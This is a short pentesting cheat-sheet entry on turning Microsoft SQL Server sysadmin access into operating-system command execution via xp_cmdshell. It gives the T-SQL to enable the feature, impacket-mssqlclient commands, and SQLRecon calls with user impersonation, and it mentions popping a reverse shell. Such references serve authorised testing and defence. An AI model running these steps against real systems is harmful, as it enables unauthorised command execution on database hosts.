Leverage xp_cmdshell Procedure

Table of contents

1. Vulnerability
2. Prerequisites
3. Exploit

---

Vulnerability

If you are authenticated as database administrator, you are able to use xp_cmdshell to execute system command.

Prerequisites

• Having sysadmin privileges on the Microsoft SQL instance.

Exploit

To do it manually, enter following SQL requests.

-- This turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE

-- This enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

If you are connected with impacket-mssqlclient, you can leverage builtin commands provided by the tool.

# This enables xp_cmdshell, then reconfigure to apply changes.
enable_xp_cmdshell
RECONFIGURE

# Now you can leverage this feature to enumerate host or pop a reverse shell.
xp_cmdshell $command

Using [SQLRecon], you can use followings.

# Add `/i:$domain\$username` to impersonate a user to perform this operation.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:ienablexp
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:ixpcmd /c:$command